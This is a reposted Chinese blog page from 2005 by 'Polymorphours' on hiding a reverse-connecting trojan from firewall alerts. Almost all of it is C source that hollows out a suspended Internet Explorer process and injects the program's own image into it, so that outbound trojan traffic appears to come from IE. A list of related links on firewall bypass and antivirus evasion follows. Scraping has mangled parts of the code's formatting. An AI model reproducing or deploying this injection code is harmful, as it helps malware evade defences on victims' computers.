绕过防火墙的反向连接报警
来源:互联网 发布:粤语流行音乐知乎 编辑:程序博客网 时间:2024/06/07 18:37
Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2005-11-17
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2005-11-17
/*Author: PolymorphoursDate: 2005/1/10另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的 反向连接报警。*/#include#include //// ntdll.lib ( 来自DDK 2000 )//#pragma comment(lib,"ntdll.lib") typedef long NTSTATUS; NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection( HANDLE ProcessHandle, PVOID BaseAddress ); typedef struct _ChildProcessInfo { DWORD dwBaseAddress; DWORD dwReserve; } CHILDPROCESS, *PCHILDPROCESS; BOOL FindIePath(char *IePath,int *dwBuffSize); BOOL InjectProcess(void); DWORD GetSelfImageSize(HMODULE hModule); BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess );char szIePath[MAX_PATH];int main(void) { if (InjectProcess() ) { printf("This is my a test code,made by (Polymorphours)shadow3./r/n"); } else { MessageBox(NULL,"进程插入完成","Text",MB_OK); } return 0; } BOOL FindIePath(char *IePath,int *dwBuffSize) { char szSystemDir[MAX_PATH]; GetSystemDirectory(szSystemDir,MAX_PATH); szSystemDir[2] = '/0' lstrcat(szSystemDir,"//Program Files//Internet Explorer//iexplore.exe"); lstrcpy(IePath, szSystemDir); return TRUE; } BOOL InjectProcess(void) { char szModulePath[MAX_PATH]; DWORD dwImageSize = 0; STARTUPINFO si = {0}; PROCESS_INFORMATION pi; CONTEXT ThreadCxt; DWORD *PPEB; DWORD dwWrite = 0; CHILDPROCESS stChildProcess; LPVOID lpVirtual = NULL; PIMAGE_DOS_HEADER pDosheader = NULL; PIMAGE_NT_HEADERS pVirPeHead = NULL; HMODULE hModule = NULL; ZeroMemory( szModulePath, MAX_PATH ); ZeroMemory( szIePath, MAX_PATH ); GetModuleFileName( NULL, szModulePath, MAX_PATH ); FindIePath( szIePath, NULL ); if ( lstrcmpiA( szIePath, szModulePath ) == 0 ) { return FALSE; } hModule = GetModuleHandle( NULL ); if ( hModule == NULL ) { return FALSE; } pDosheader = (PIMAGE_DOS_HEADER)hModule; pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew); dwImageSize = GetSelfImageSize(hModule); //// 以挂起模式启动一个傀儡进程,这里为了传透防火墙,使用IE进程//if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess) ) { printf("CHILD PID: [%d]/r/n",pi.dwProcessId); //// 卸载需要注入进程中的代码//if ( ZwUnmapViewOfSection( pi.hProcess, (LPVOID)stChildProcess.dwBaseAddress ) == 0 ) { //// 重新分配内存//lpVirtual = VirtualAllocEx( pi.hProcess, (LPVOID)hModule, dwImageSize, MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE ); if ( lpVirtual ) { printf("Unmapped and Allocated Mem Success./r/n"); } } else { printf("ZwUnmapViewOfSection() failed./r/n"); return TRUE; } if ( lpVirtual ) { PPEB = (DWORD *)ThreadCxt.Ebx; //// 重写装载地址 //WriteProcessMemory( pi.hProcess, &PPEB[2], &lpVirtual, sizeof(DWORD), &dwWrite ); //// 写入自己进程的代码到目标进程//if ( WriteProcessMemory( pi.hProcess, lpVirtual, hModule, dwImageSize, &dwWrite) ) { printf("image inject into process success./r/n"); ThreadCxt.ContextFlags = CONTEXT_FULL; if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress ) { ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint; } else { ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint; } #ifdef DEBUG printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax); printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx); printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx); printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx); printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip); #endif SetThreadContext(pi.hThread, &ThreadCxt); ResumeThread(pi.hThread); } else { printf("WirteMemory Failed,code:%d/r/n",GetLastError()); TerminateProcess(pi.hProcess, 0); } } else { printf("VirtualMemory Failed,code:%d/r/n",GetLastError()); TerminateProcess(pi.hProcess, 0); } } return TRUE; } DWORD GetSelfImageSize(HMODULE hModule) { DWORD dwImageSize; _asm { mov ecx,0x30 mov eax, fs:[ecx] mov eax, [eax + 0x0c] mov esi, [eax + 0x0c] add esi,0x20 lodsd mov dwImageSize,eax } return dwImageSize; } BOOL CreateInjectProcess( PPROCESS_INFORMATION pi, PCONTEXT pThreadCxt, CHILDPROCESS *pChildProcess ) { STARTUPINFO si = {0}; DWORD *PPEB; DWORD read; // 使用挂起模式启动ie if( CreateProcess( NULL, szIePath, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi ) ) { pThreadCxt->ContextFlags = CONTEXT_FULL; GetThreadContext(pi->hThread, pThreadCxt); PPEB = (DWORD *)pThreadCxt->Ebx; // 得到ie的装载基地址 ReadProcessMemory( pi->hProcess, &PPEB[2], (LPVOID)&(pChildProcess->dwBaseAddress), sizeof(DWORD), &read ); return TRUE ; } return FALSE; }
- [转载]绕过防火墙的反向连接报警
- 绕过防火墙的反向连接报警
- 学习Polymorphours的绕过防火墙的反向连接报警代码
- 学习Polymorphours的绕过防火墙的反向连接报警代码,心得,它的思路
- 绕过防火墙限制的两种方法
- [转贴]绕过xp sp2防火墙的代码
- 绕过XP SP2防火墙的代码
- 绕过xp sp2防火墙的代码
- Nmap绕过防火墙&脚本的使用
- sqlmap 绕过防火墙的tamper脚本
- 通过ssh反向连接内网主机的方法(防火墙的主机)
- VISTA120报警主机与报警键盘的连接说明
- 如何绕过防火墙?
- 绕过防火墙访问VPS
- 绕过web防火墙
- 绕过 KIS 7 防火墙的一种简单方法
- 绕过 KIS 7 防火墙的一种简单方法
- 反向连接的SHELL
- PpLK: Practical Java前两章笔记完成
- 修改导入表实现DLL注入
- FAKE PROTOCOL NDIS hook 支持拨号的选项
- WINDOWS 2K Dll 加载过程
- 对抗杀毒软件的内存扫描
- 绕过防火墙的反向连接报警
- Windows rootkits in 2005
- 快忍受不了这个blog了!!
- History of Linux
- 命令行下执行sql server语句
- 深入理解abstract class和interface
- 接口和继承方式之比较的漫谈
- 提倡使用 interface 而尽是避免使用 abstract class
- jdom1.0
